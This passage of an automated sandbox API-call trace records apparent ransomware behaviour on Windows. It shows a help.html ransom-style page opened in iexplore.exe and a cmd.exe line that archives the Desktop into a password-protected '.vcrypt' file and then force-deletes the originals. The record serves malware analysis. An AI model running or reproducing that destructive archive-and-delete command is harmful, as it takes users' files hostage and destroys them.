0xffffffff [0043.342] GetLastError () returned 0x2 [0043.342] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0043.342] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\iexplore.exe", fInfoLevelId=0x1, lpFindFileData=0x1f2bbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1f2bbc) returned 0xffffffff [0043.355] GetLastError () returned 0x2 [0043.355] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\iexplore.exe.*", fInfoLevelId=0x1, lpFindFileData=0x1f2b9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1f2b9c) returned 0xffffffff [0043.357] GetLastError () returned 0x2 [0043.357] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\iexplore.exe", fInfoLevelId=0x1, lpFindFileData=0x1f2b9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1f2b9c) returned 0xffffffff [0043.359] GetLastError () returned 0x2 [0043.359] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0043.359] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\iexplore.exe", fInfoLevelId=0x1, lpFindFileData=0x1f2bbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1f2bbc) returned 0xffffffff [0043.361] GetLastError () returned 0x2 [0043.361] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\iexplore.exe.*", fInfoLevelId=0x1, lpFindFileData=0x1f2b9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1f2b9c) returned 0xffffffff [0043.363] GetLastError () returned 0x2 [0043.363] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\iexplore.exe", fInfoLevelId=0x1, lpFindFileData=0x1f2b9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1f2b9c) returned 0xffffffff [0043.364] GetLastError () returned 0x2 [0043.364] GetStartupInfoW (in: lpStartupInfo=0x1f30d4 | out: lpStartupInfo=0x1f30d4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x13, lpReserved2=0x3b19e6, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0043.364] GetLastError () returned 0x2 [0043.365] GetConsoleWindow () returned 0x5011c [0043.365] LoadLibraryExA (lpLibFileName="SHELL32.dll", hFile=0x0, dwFlags=0x0) returned 0x759d0000 [0046.169] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteExW") returned 0x759f1e46 [0046.169] ShellExecuteExW (in: pExecInfo=0x1f3118*(cbSize=0x3c, fMask=0x140, hwnd=0x5011c, lpVerb=0x0, lpFile="iexplore.exe", lpParameters=" C:\\Users\\5p5NrGJn0jS HALPmcxz/help.html", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x1f3118*(cbSize=0x3c, fMask=0x140, hwnd=0x5011c, lpVerb=0x0, lpFile="iexplore.exe", lpParameters=" C:\\Users\\5p5NrGJn0jS HALPmcxz/help.html", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x1f4)) returned 1 [0056.438] CloseHandle (hObject=0x1f4) returned 1 [0056.438] _get_osfhandle (_FileHandle=1) returned 0x7 [0056.438] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0056.438] _get_osfhandle (_FileHandle=1) returned 0x7 [0056.439] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a2941ac | out: lpMode=0x4a2941ac) returned 1 [0056.439] _get_osfhandle (_FileHandle=0) returned 0x3 [0056.439] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a2941b0 | out: lpMode=0x4a2941b0) returned 1 [0056.439] SetConsoleInputExeNameW () returned 0x1 [0056.439] GetConsoleOutputCP () returned 0x1b5 [0056.439] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a294260 | out: lpCPInfo=0x4a294260) returned 1 [0056.439] SetThreadUILanguage (LangId=0x0) returned 0x409 [0056.440] exit (_Code=0) Thread: id = 18 os_tid = 0x53c Thread: id = 19 os_tid = 0x1c0 Thread: id = 20 os_tid = 0x7e8 Process: id = "18" image_name = "iexplore.exe" filename = "c:\\program files (x86)\\internet explorer\\iexplore.exe" page_root = "0x42e6b000" os_pid = "0x518" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "17" os_parent_pid = "0x7dc" cmd_line = "\"C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\" C:\\Users\\5p5NrGJn0jS HALPmcxz/help.html" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 21 os_tid = 0x734 Thread: id = 34 os_tid = 0x928 Thread: id = 36 os_tid = 0x948 Thread: id = 38 os_tid = 0x978 Thread: id = 39 os_tid = 0x988 Thread: id = 40 os_tid = 0x998 Thread: id = 57 os_tid = 0x9d0 Thread: id = 58 os_tid = 0x9d4 Thread: id = 59 os_tid = 0xa54 Thread: id = 96 os_tid = 0x918 Thread: id = 98 os_tid = 0x564 Thread: id = 99 os_tid = 0x79c Thread: id = 100 os_tid = 0x5d4 Thread: id = 102 os_tid = 0xb38 Process: id = "19" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x459ca000" os_pid = "0x55c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USERPROFILE%\\Desktop\\*\" & del /f /s /q \"%USERPROFILE%\\Desktop\\\" & FOR /D %p IN (\"%USERPROFILE%\\Desktop\\*\") do rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 24 os_tid = 0x7e4 [0056.672] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x3ef7bc | out: lpSystemTimeAsFileTime=0x3ef7bc*(dwLowDateTime=0x145fc20, dwHighDateTime=0x1d62400)) [0056.672] GetCurrentProcessId () returned 0x55c [0056.672] GetCurrentThreadId () returned 0x7e4 [0056.672] GetTickCount () returned 0x1146587 [0056.672] QueryPerformanceCounter (in: lpPerformanceCount=0x3ef7b4 | out: lpPerformanceCount=0x3ef7b4*=17680550962) returned 1 [0056.674] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0056.674] __set_app_type (_Type=0x1) [0056.674] __p__fmode () returned 0x770331f4 [0056.674] __p__commode () returned 0x770331fc [0056.674] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0056.674] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0056.675] GetCurrentThreadId () returned 0x7e4 [0056.675] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7e4) returned 0x60 [0056.675] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0056.675] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0056.675] SetThreadUILanguage (LangId=0x0) returned 0x409 [0056.675] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0056.675] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x3ef74c | out: phkResult=0x3ef74c*=0x0) returned 0x2 [0056.676] VirtualQuery (in: lpAddress=0x3ef783, lpBuffer=0x3ef71c, dwLength=0x1c | out: lpBuffer=0x3ef71c*(BaseAddress=0x3ef000, AllocationBase=0x2f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0056.676] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x3ef71c, dwLength=0x1c | out: lpBuffer=0x3ef71c*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0056.676] VirtualQuery (in: lpAddress=0x2f1000, lpBuffer=0x3ef71c, dwLength=0x1c | out: lpBuffer=0x3ef71c*(BaseAddress=0x2f1000, AllocationBase=0x2f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0056.676] VirtualQuery (in: lpAddress=0x2f3000, lpBuffer=0x3ef71c, dwLength=0x1c | out: lpBuffer=0x3ef71c*(BaseAddress=0x2f3000, AllocationBase=0x2f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0056.676] VirtualQuery (in: lpAddress=0x3f0000, lpBuffer=0x3ef71c, dwLength=0x1c | out: lpBuffer=0x3ef71c*(BaseAddress=0x3f0000, AllocationBase=0x3f0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0056.676] GetConsoleOutputCP () returned 0x1b5 [0056.676] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0056.676] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0056.676] _get_osfhandle (_FileHandle=1) returned 0x7 [0056.676] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0056.677] _get_osfhandle (_FileHandle=1) returned 0x7 [0056.677] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0056.677] _get_osfhandle (_FileHandle=1) returned 0x7 [0056.677] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0056.677] _get_osfhandle (_FileHandle=0) returned 0x3 [0056.677] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0056.678] GetEnvironmentStringsW () returned 0x7c23e8* [0056.678] GetProcessHeap () returned 0x7b0000 [0056.678] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0xaca) returned 0x7c2ec0 [0056.678] FreeEnvironmentStringsW (penv=0x7c23e8) returned 1 [0056.678] GetProcessHeap () returned 0x7b0000 [0056.678] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x4) returned 0x7c2268 [0056.678] GetEnvironmentStringsW () returned 0x7c23e8* [0056.678] GetProcessHeap () returned 0x7b0000 [0056.678] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0xaca) returned 0x7c3998 [0056.679] FreeEnvironmentStringsW (penv=0x7c23e8) returned 1 [0056.679] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3ee6bc | out: phkResult=0x3ee6bc*=0x68) returned 0x0 [0056.679] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3ee6c4, lpData=0x3ee6c8, lpcbData=0x3ee6c0*=0x1000 | out: lpType=0x3ee6c4*=0x0, lpData=0x3ee6c8*=0x0, lpcbData=0x3ee6c0*=0x1000) returned 0x2 [0056.679] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3ee6c4, lpData=0x3ee6c8, lpcbData=0x3ee6c0*=0x1000 | out: lpType=0x3ee6c4*=0x4, lpData=0x3ee6c8*=0x1, lpcbData=0x3ee6c0*=0x4) returned 0x0 [0056.679] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3ee6c4, lpData=0x3ee6c8, lpcbData=0x3ee6c0*=0x1000 | out: lpType=0x3ee6c4*=0x0, lpData=0x3ee6c8*=0x1, lpcbData=0x3ee6c0*=0x1000) returned 0x2 [0056.679] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3ee6c4, lpData=0x3ee6c8, lpcbData=0x3ee6c0*=0x1000 | out: lpType=0x3ee6c4*=0x4, lpData=0x3ee6c8*=0x0, lpcbData=0x3ee6c0*=0x4) returned 0x0 [0056.679] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3ee6c4, lpData=0x3ee6c8, lpcbData=0x3ee6c0*=0x1000 | out: lpType=0x3ee6c4*=0x4, lpData=0x3ee6c8*=0x40, lpcbData=0x3ee6c0*=0x4) returned 0x0 [0056.679] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3ee6c4, lpData=0x3ee6c8, lpcbData=0x3ee6c0*=0x1000 | out: lpType=0x3ee6c4*=0x4, lpData=0x3ee6c8*=0x40, lpcbData=0x3ee6c0*=0x4) returned 0x0 [0056.679] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3ee6c4, lpData=0x3ee6c8, lpcbData=0x3ee6c0*=0x1000 | out: lpType=0x3ee6c4*=0x0, lpData=0x3ee6c8*=0x40, lpcbData=0x3ee6c0*=0x1000) returned 0x2 [0056.679] RegCloseKey (hKey=0x68) returned 0x0 [0056.680] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3ee6bc | out: phkResult=0x3ee6bc*=0x68) returned 0x0 [0056.680] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3ee6c4, lpData=0x3ee6c8, lpcbData=0x3ee6c0*=0x1000 | out: lpType=0x3ee6c4*=0x0, lpData=0x3ee6c8*=0x40, lpcbData=0x3ee6c0*=0x1000) returned 0x2 [0056.680] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3ee6c4, lpData=0x3ee6c8, lpcbData=0x3ee6c0*=0x1000 | out: lpType=0x3ee6c4*=0x4, lpData=0x3ee6c8*=0x1, lpcbData=0x3ee6c0*=0x4) returned 0x0 [0056.680] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3ee6c4, lpData=0x3ee6c8, lpcbData=0x3ee6c0*=0x1000 | out: lpType=0x3ee6c4*=0x0, lpData=0x3ee6c8*=0x1, lpcbData=0x3ee6c0*=0x1000) returned 0x2 [0056.680] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3ee6c4, lpData=0x3ee6c8, lpcbData=0x3ee6c0*=0x1000 | out: lpType=0x3ee6c4*=0x4, lpData=0x3ee6c8*=0x0, lpcbData=0x3ee6c0*=0x4) returned 0x0 [0056.680] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3ee6c4, lpData=0x3ee6c8, lpcbData=0x3ee6c0*=0x1000 | out: lpType=0x3ee6c4*=0x4, lpData=0x3ee6c8*=0x9, lpcbData=0x3ee6c0*=0x4) returned 0x0 [0056.680] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3ee6c4, lpData=0x3ee6c8, lpcbData=0x3ee6c0*=0x1000 | out: lpType=0x3ee6c4*=0x4, lpData=0x3ee6c8*=0x9, lpcbData=0x3ee6c0*=0x4) returned 0x0 [0056.680] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3ee6c4, lpData=0x3ee6c8, lpcbData=0x3ee6c0*=0x1000 | out: lpType=0x3ee6c4*=0x0, lpData=0x3ee6c8*=0x9, lpcbData=0x3ee6c0*=0x1000) returned 0x2 [0056.680] RegCloseKey (hKey=0x68) returned 0x0 [0056.680] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b65 [0056.680] srand (_Seed=0x5eb34b65) [0056.680] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USERPROFILE%\\Desktop\\*\" & del /f /s /q \"%USERPROFILE%\\Desktop\\\" & FOR /D %p IN (\"%USERPROFILE%\\Desktop\\*\") do rmdir \"%p\" /s /q" [0056.680] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFILE%\\%username%_desktop.vcrypt\" \"%USERPROFILE%\\Desktop\\*\" & del /f /s /q \"%USERPROFILE%\\Desktop\\\" & FOR /D %p IN (\"%USERPROFILE%\\Desktop\\*\") do rmdir \"%p\" /s /q" [0056.681] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0056.681] GetProcessHeap () returned 0x7b0000 [0056.681] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x210) returned 0x7c23e8 [0056.681] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7c23f0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0056.681] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0056.681] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0056.681] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0056.681] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0056.681] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0056.681] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0056.681] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0056.681] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0056.681] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0056.681] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0056.681] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0056.681] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0056.681] GetProcessHeap () returned 0x7b0000 [0056.681] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c2ec0 | out: hHeap=0x7b0000) returned 1 [0056.681] GetEnvironmentStringsW () returned 0x7c2600* [0056.682] GetProcessHeap () returned 0x7b0000 [0056.682] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0xae2) returned 0x7c4f60 [0056.682] FreeEnvironmentStringsW (penv=0x7c2600) returned 1 [0056.682] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0056.682] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0056.682] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0056.682] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0056.682] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0056.682] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0056.682] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0056.682] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0056.682] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0056.682] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0056.682] GetProcessHeap () returned 0x7b0000 [0056.682] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x54) returned 0x7c5a50 [0056.682] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3ef488 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0056.682] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x3ef488, lpFilePart=0x3ef484 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3ef484*="Desktop") returned 0x25 [0056.682] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0056.683] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x3ef204 | out: lpFindFileData=0x3ef204*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x7c2278 [0056.683] FindClose (in: hFindFile=0x7c2278 | out: hFindFile=0x7c2278) returned 1 [0056.683] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x3ef204 | out: lpFindFileData=0x3ef204*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x108960, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x108960, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x7c2278 [0056.683] FindClose (in: hFindFile=0x7c2278 | out: hFindFile=0x7c2278) returned 1 [0056.683] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0056.683] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x3ef204 | out: lpFindFileData=0x3ef204*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf5c21be0, ftLastAccessTime.dwHighDateTime=0x1d623ff, ftLastWriteTime.dwLowDateTime=0xf5c21be0, ftLastWriteTime.dwHighDateTime=0x1d623ff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x7c2278 [0056.684] FindClose (in: hFindFile=0x7c2278 | out: hFindFile=0x7c2278) returned 1 [0056.684] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0056.684] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0056.684] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0056.684] GetProcessHeap () returned 0x7b0000 [0056.684] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c4f60 | out: hHeap=0x7b0000) returned 1 [0056.684] GetEnvironmentStringsW () returned 0x7c4470* [0056.684] GetProcessHeap () returned 0x7b0000 [0056.684] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0xb36) returned 0x7c5ab0 [0056.684] FreeEnvironmentStringsW (penv=0x7c4470) returned 1 [0056.684] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0056.684] GetProcessHeap () returned 0x7b0000 [0056.685] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c5a50 | out: hHeap=0x7b0000) returned 1 [0056.685] GetProcessHeap () returned 0x7b0000 [0056.685] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x400e) returned 0x7c65f0 [0056.685] GetProcessHeap () returned 0x7b0000 [0056.685] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x2ac) returned 0x7b0ff0 [0056.685] GetProcessHeap () returned 0x7b0000 [0056.685] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c65f0 | out: hHeap=0x7b0000) returned 1 [0056.685] GetConsoleOutputCP () returned 0x1b5 [0056.685] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0056.686] GetUserDefaultLCID () returned 0x409 [0056.686] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0056.687] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x3ef5c8, cchData=128 | out: lpLCData="0") returned 2 [0056.687] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x3ef5c8, cchData=128 | out: lpLCData="0") returned 2 [0056.687] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x3ef5c8, cchData=128 | out: lpLCData="1") returned 2 [0056.687] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0056.687] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0056.687] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0056.687] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0056.687] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0056.687] GetLocaleInfoW (in: 